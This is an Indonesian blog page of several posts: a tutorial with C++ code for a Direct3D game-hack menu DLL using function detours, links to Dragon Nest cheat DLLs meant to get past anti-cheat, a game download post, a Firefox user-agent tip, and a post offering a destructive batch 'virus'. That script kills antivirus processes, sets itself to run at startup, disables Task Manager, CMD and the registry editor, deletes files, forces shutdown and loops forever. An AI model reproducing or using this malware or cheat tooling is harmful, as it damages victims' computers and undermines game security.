[Tutorial] Make D3D menu HACK

Posted by Rizky Prasetya 15.40, under |

Tutorial Membuat D3D MENU HACK

Tools yang dibutuhkan :


  • VC++ 2010
  • Microsoft DirectX 9.0 SDK (Summer 2004)

Okey setelah dapet Alat perang..

Langkah Pertama :

  • Jalankan Visual C++ 2010 Express Edition, Setelah itu buat new Project.
  • Pilih Visual C++, Empty Project dan namakan dengan zenix D3Dbase.

    Screenshot :
    1.jpg
  • Ok Project telah dibuat, Setelah itu buat Header setelah itu Klik pada Project dan pilih Add New Item.
    Pilih Header File dan Namai dengan zenixMenuClass.h dan isikan code berikut :
    Spoiler zenixMenuClass.h
    //==================================================================
    // This file is part of zenixbase d3d v1
    // (c) copyright zenix 2010
    // special thanks to: 
    //   Alkatraz
    //   //mcz yang selalu dukung gw
    //   nyit-nyit.net
    //==================================================================
    #include "Functions.h"
    typedef struct{
            int index;
            char * title;
            int *hack;
            int hackmaxval;
            int hacktype;
            DWORD HCOLOR;
    }ITEM;
    class zenixMenu {
            public:
            LPDIRECT3DDEVICE9 pDevice;
            LPD3DXFONT pFont;
    
            int hackcount;
            int selector;
            int x,y,w,h;
            DWORD COLOR;
    
            ITEM HACKITEM[99];
            char hackrval[256];
    
            void CreateItem(int index, char * title, int *hack,int hackmaxval=1,int hacktype=0);
            void BuildMenu(char * menuname, int x, int y, int h, int w, DWORD TITLECOL, DWORD BACKCOLOR, DWORD BORDERCOLOR, LPDIRECT3DDEVICE9 pDevice);
            void RenderMenu();
    };
    typedef HRESULT ( WINAPI* oReset )( LPDIRECT3DDEVICE9 pDevice, D3DPRESENT_PARAMETERS* pPresentationParameters );
    typedef HRESULT (WINAPI* oEndScene)(LPDIRECT3DDEVICE9 pDevice);
    //Colors A,R,G,B Gan Silahkan dipakai untuk membuat Chams
    #define RED D3DCOLOR_ARGB(255, 255, 0, 0)
    #define GREEN D3DCOLOR_ARGB(255, 0, 255, 0)
    #define BLUE D3DCOLOR_ARGB(255, 0, 0, 255)
    #define WHITE D3DCOLOR_ARGB(255, 255, 255, 255)
    #define BLACK D3DCOLOR_ARGB(255, 0, 0, 0)
    #define YELLOW D3DCOLOR_ARGB(255, 255, 255, 0)
    #define TEAL D3DCOLOR_ARGB(255, 0, 255, 255)
    #define PINK D3DCOLOR_ARGB(255, 255, 240, 0)
    #define ORANGE D3DCOLOR_ARGB(255, 255, 132, 0)
    #define LIME D3DCOLOR_ARGB(255, 198, 255, 0)
    #define SKYBLUE D3DCOLOR_ARGB(255, 0, 180, 255)
    #define MAROON D3DCOLOR_ARGB(255, 142, 30, 0)
    #define LGRAY D3DCOLOR_ARGB(255, 174, 174, 174) #define DGRAY D3DCOLOR_ARGB(255, 71, 65, 64) #define BROWN D3DCOLOR_ARGB(255, 77, 46, 38)
    #define SHIT D3DCOLOR_ARGB(255, 74, 38, 38) 
  • Setelah itu buat Header lagi dan Beri Nama dengan Functions.h dan Isi dengan code berikut :
    Spoiler Functions.h
    //==================================================================
    // This file is part of zenixbase d3d v1
    // (c) copyright zenix 2010
    // special thanks to: 
    //   Alkatraz
    //   //mcz yang selalu dukung gw
    //   nyit-nyit.net
    //==================================================================
    #include "SystemIncludes.h"
    void PrintText(char pString[], int x, int y, D3DCOLOR col, ID3DXFont *font)
    {
            RECT FontRect = { x, y, x+500, y+30 };
            font->DrawText( NULL, pString, -1, &FontRect, DT_LEFT | DT_WORDBREAK, col);
    }
    void FillRGB( int x, int y, int w, int h, D3DCOLOR color, IDirect3DDevice9* pDevice )
    {
            if( w < 0 )w = 1;
            if( h < 0 )h = 1;
            if( x < 0 )x = 1;
            if( y < 0 )y = 1;
    
            D3DRECT rec = { x, y, x + w, y + h };
            pDevice->Clear( 1, &rec, D3DCLEAR_TARGET, color, 0, 0 );
    }
    void DrawBorder( int x, int y, int w, int h, int px, D3DCOLOR BorderColor, IDirect3DDevice9* pDevice )
    {
            FillRGB( x, (y + h - px), w, px,        BorderColor, pDevice );
            FillRGB( x, y, px, h,                           BorderColor, pDevice );
            FillRGB( x, y, w, px,                           BorderColor, pDevice );
            FillRGB( (x + w - px), y, px, h,        BorderColor, pDevice );
    }
    void DrawBox( int x, int y, int w, int h, D3DCOLOR BoxColor, D3DCOLOR BorderColor, IDirect3DDevice9* pDevice )
    {
            FillRGB( x, y, w, h,            BoxColor, pDevice );
            DrawBorder( x, y, w, h, 1,      BorderColor, pDevice );
    }  
    bool isMouseinRegion(int x1, int y1, int x2, int y2) {
            POINT cPos;
            GetCursorPos(&cPos);
            if(cPos.x > x1 && cPos.x < x2 && cPos.y > y1 && cPos.y < y2){
                    return true;
            } else {
                    return false;
            }
    }
    bool bCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)
    {
            for(;*szMask;++szMask,++pData,++bMask)
                    if(*szMask=='x' && *pData!=*bMask)  
                            return 0;
            return (*szMask) == NULL;
    }
    
    DWORD FindPattern(DWORD dwAddress,DWORD dwLen,BYTE *bMask,char * szMask)
    {
            for(DWORD i=0; i<dwLen; i++)
                    if (bCompare((BYTE*)(dwAddress+i),bMask,szMask))  
                            return (DWORD)(dwAddress+i);
            return 0;
    }
    void *DetourFunction (BYTE *src, const BYTE *dst, const int len)
    {
            BYTE *jmp;
            DWORD dwback;
            DWORD jumpto, newjump;
    
            VirtualProtect(src,len,PAGE_READWRITE,&dwback);
            
            if(src[0] == 0xE9)
            {
                    jmp = (BYTE*)malloc(10);
                    jumpto = (*(DWORD*)(src+1))+((DWORD)src)+5;
                    newjump = (jumpto-(DWORD)(jmp+5));
                    jmp[0] = 0xE9;
               *(DWORD*)(jmp+1) = newjump;
                    jmp += 5;
                    jmp[0] = 0xE9;
               *(DWORD*)(jmp+1) = (DWORD)(src-jmp);
            }
            else
            {
                    jmp = (BYTE*)malloc(5+len);
                    memcpy(jmp,src,len);
                    jmp += len;
                    jmp[0] = 0xE9;
               *(DWORD*)(jmp+1) = (DWORD)(src+len-jmp)-5;
            }
            src[0] = 0xE9;
       *(DWORD*)(src+1) = (DWORD)(dst - src) - 5;
    
            for(int i = 5; i < len; i++)
                    src[i] = 0x90;
            VirtualProtect(src,len,dwback,&dwback);
            return (jmp-len);
    } 
  • Buat Header lagi beri Nama SystemIncludes.h dan Isikan code berikut :

    SystemIncludes.h
    //==================================================================
    // This file is part of zenixbase d3d v1
    // (c) copyright zenix 2010
    // special thanks to: 
    //   Alkatraz
    //   //mcz yang selalu dukung gw
    //   nyit-nyit.net
    //==================================================================
    #include <Windows.h>
    #include <stdio.h>
    #include <d3d9.h>
    #include <d3dx9.h>
    #pragma comment(lib,"d3dx9.lib")
  • Klik pada Source Files kemudian Add New Item pilih C++ File (.cpp) Beri Nama D3dbase.cpp Isikan code berikut :
    Spoiler D3dbase.cpp

    Screenshot :

    3.jpg
  • Kemudian Save All Project. Setelah project telah di Save lalu Compile/Start Debugging.
  • Jangan lupa rubah Properties Project rubah Application (.exe) menjadi Dinamic Library (.dll)

    Screenshot :

    2.jpg

Pada Fungtions.h void *DetourFunction

Spoiler Fungtions.h

Bisa kalian ganti dengan :
void *DetourFunction (BYTE *src, const BYTE *dst, const int len)
{
                BYTE *jmp = (BYTE*)malloc(len+5);
        DWORD dwBack;

        VirtualProtect(src, len, PAGE_EXECUTE_READWRITE, &dwBack);
        memcpy(jmp, src, len);  
        jmp += len;
        jmp[0] = 0xE9;
        *(DWORD*)(jmp+1) = (DWORD)(src+len - jmp) - 5;
        src[0] = 0xE9;
        *(DWORD*)(src+1) = (DWORD)(dst - src) - 5;
        for (int i=5; i<len; i++)  src[i]=0x90;
        VirtualProtect(src, len, dwBack, &dwBack);
        return (jmp-len);
}

zenix D3D App :
zenix d3d.jpg


Download :
File Terlampir  zenix D3D App.zip   849.25K   1937 Jumlah Unduhan

Screenshot Hasil :
5.jpg

Download Link :
File Terlampir  D3D9test.zip   26.52K   2359 Jumlah Unduhan

Credit : Alkatraz mpgh, zenix@N3


Ini Untuk Menu background pada game PointBlank.
XD


9.jpg

Untuk Sample .dllnya..

Download :
File Terlampir  Sample II zenix Hack.zip   61.05K   2094 Jumlah Unduhan

Credit : zenix@N3

zenix@N3

Dragon Nest SEA Cheat (Auto Update)

Posted by Rizky Prasetya 15.38, under |

Gambar Terposting

Trainer:
Dragon Nest Trainer.dll
Released:
•10/06/2012
Greetz to:
Ceh430, Mihox
Packer/Protector:
N/A
GameTarget:
DragonNest.exe
Anti-Cheat:
AhnLabHackShieldPro
Type:
Hack
Features:
No Cooldown
No Animation
Wall Hack
TestedWork ON :
Windows XP, Vista, & Win7

Cheat bisa auto update jadi ngak perlu kuatir soal patch baru.

Pemakaian:
1. Extract file
2. Inject dll ke process DragonNest.exe
3. Login & cit

Virustotal:
https://www.virustot...sis/1339338941/

Download (10 Juni 2012):
http://www.mirrorcre...files/SIVF16U2/ (scroll ke bawah & tunggu fetching download links)

Dragon Nest INA [tumble]

Posted by Rizky Prasetya 15.32, under |

Trainer: •hrc_n3_sep.dlll
Released: •16/09/2012
Greetz to :Om Drache,//HRD, xfile , petinggi n3 special om dono :) tnx alot
Packer/Protector: •Enigma
GameTarget: • DragonNest INA
Anti-Cheat: •AhnLabHackShieldPro
Type: • Hack
Isi : Tumble [auto on] All Job
Key: • END = Exit Game
TestedWork ON :• Windows XP 32 [Sword master & Hunter]

DOWNLOAD
http://www.mediafire...61yqvol69s6o2tp

Lumayan buat lari2 Momon =))

Resiko Banned di tanggung pengguna :)
Happy Cheating

vitot
https://www.virustot...sis/1347953531/

Download Game Need for Speed : Most Wanted (PC) Full Version

Posted by Rizky Prasetya 12.05, under |





Salah satu game jadul tapi masih mantap untuk dimainkan saat ini, lumayan untuk mengisi waktu luang kamu. Download Full version untuk PC kamu sesuaikan dengan System requirements agar dapat berjalan dengan lancar.

System requirements 

  1. OS : XP/Vista/Windows 7
  2. 1.4 GHz CPU
  3. 256 MB RAM
  4. 3 GB hard disk space,
  5. DirectX 9.0c compatible 32 MB video card with one of these chipsets Radeon 7500; Radeon Xpress 200; GeForce 2 MX; Intel 915; S3 GammaChrome S18 Pro
  6. DirectX 9.0c compatible sound card







script virus

Posted by Rizky Prasetya 15.22, under |



Ni lumayan ane kasih script BAT,lumayan buat lumpuhin komputer orang, ni script ane dapet waktu iseng surfing di Mbah google, kalo pengen nyoba tingal copy paste scriptnya

echo off

color 0a

cls

echo.

echo "Destroyer Injector [PHF]"

echo.

echo.

echo.

echo.

echo Selamat datang di Destroyer Injector.

echo.

echo.

echo pencet sembarang untuk mengaktifkannya!!! :)

pause

cls

dir %windir% /s

cls

echo Proses akses data telah selesai.

echo.

echo.

echo.

:pilih

echo Apakah anda ingin melanjutkan injecksi? (Y/N)

set /p inputchoice=

if %inputchoice% equ y goto yes

if %inputchoice% equ Y goto yes

if %inputchoice% equ n goto no

if %inputchoice% equ N goto no

echo.

echo.

echo anda memasukkan jawaban yang salah

echo silahkan coba kembali

pause

cls

goto pilih

:yes

cls

echo berikut ini kami akan mengantarkan ke alamat credit

echo tekan terserah untuk melanjutkan!!!

pause

:no

cls

start iexplore http://pontianak-hacker.blogspot.com


@echo off

copy %0 %systemroot%\namavirus.bat > nul

copy %0 *.bat > nul

Attrib +h *.bat

cls

tskill AVGUARD

tskill AVGNT

tskill NMAIN

tskill KAV

tskill ad-aware

tskill av*

tskill PCMAV

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Explorer.exe /t REG_SZ /d %systemroot%\namavirus.bat /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Antz /t REG_SZ /d C:\Windows\Antz.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d toepan.tk /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d Bukannya ane iseng gan cuman gg ada kerjaan aja /f

reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

cls

echo [windows] >> %systemroot%\win.ini

echo load=%systemroot%\namavirus.bat >> %systemroot%\win.ini

echo run=%systemroot%\namavirus.bat >> %systemroot%\win.ini

Attrib +h %systemroot%\win.ini

del C:\docume~\owner\Desktop

shutdown -s -t 15

msg * ”sorry ya computer nya death dulu ^_^”

msg * ”sorry ya computer nya death dulu ^_^”

msg * ”-PontianakHackerFoundation-”

msg * ”-PontianakHackerFoundation-”

cls

:hell

start %0

goto hell

exit

Lo save tuh script dengan file extensi bat, contoh ucinggarong.bat & typenya pake Allfile

Mengubah Mozilla Firefox Seperti Opera Mini

Posted by Rizky Prasetya 20.35, under |

Pernah kepikiran untuk membuka situs mobile atau wap site dari PC? Tentu susah unutk membuka berbagai site misalnya m.kaskus.us atau waptrick atau juga wen.ru Selain pakek cara susah yaitu dengan SJ Boy lalu membuka Opera Mini, ternyata terdapat cara yang lebih mudah. Gimanakah caranya? Nah Trik kali ini bkal membahas tentang bagaimana caranya untuk menipu web yang kita kunjungi agar menganggap kalau kita berselancar menggunakan hp. langsung aja ke tutornya (santai aja gak pakai download). CARA PERTAMA tapi cara ini gak permanen 1. pada FireFox buka tab baru trus di address bar ketik : “about:config” (tanpa tanda titik dua “:”) 2. muncul kotak dialog, pilih “i’ll be carefull, i promise” 3. klik kanan di sembarang tempat, pilih “New –> String” 4. Muncul kotak “Enter the preference name” masukkan “general.useragent.override” (tanpa tanda titik dua) 5. Muncul kotak “Enter String value” masukkan “Opera Mini” lalu klik OK 6. selesai deh, langsung saja buka web yang nggak bisa dibuka pakai komputer Contohnya Wapdam.com Tampilan sebelum di lakukan trik ini
Tampilan Sesudah Dilakukan Trik
“trus Cara Ngembaliinnya gimana?” Gampang kok tinggal klik kanan string yang baru dibuat trus pilih reset CARA KEDUA Cara kedua ini dengan menggunakan bantuan add ons, Namanya User Agent Switcher yang dapat di download disini. Cara kerjanya menyamarkan browser Firefox kita agar terdeteksi sebagai browser HP. Mudah kan? Sebelumnya pastikan dulu add-on tersebut sudah terpasang, lalu restart Firefox Anda. Kemudian pilih: Tools->Default User Agent->Edit User Agent->New User Agent.Berikut ini ada beberapa settingan yang bisa saya temukan dan terbukti dapat digunakan: *Deskripsi :Opera Mini *User Agent :Opera/9.50 (J2ME/MIDP; Opera Mini/4.1.10781/302; U; en) *Deskripsi :Opera Mobile 9.33b *User Agent :Opera/9.0 (Microsoft Windows; PPC; Opera Mobile/331; U; en) *Deskripsi :BlackBerry 8800 *User Agent :BlackBerry8800/4.5.0.9 Profile/MIDP-2.0 Configuration/CLDC-1.1
Jika Anda masih belum yakin, dapat di tes di http://whatsmyuseragent.com hanya dengan mengunjunginya (bukan jebakan betmen kok :D ). Sebaiknya di cek sebelum dan setelah penginstallan addon tersebut.Jika ingin mengembalikan settingan tersebut, tinggal default user agent di Menu Tools. Browser anda akan kembali menjadi Modzilla Firefox, bukan lagi Opera Mini maupun BlackBerry.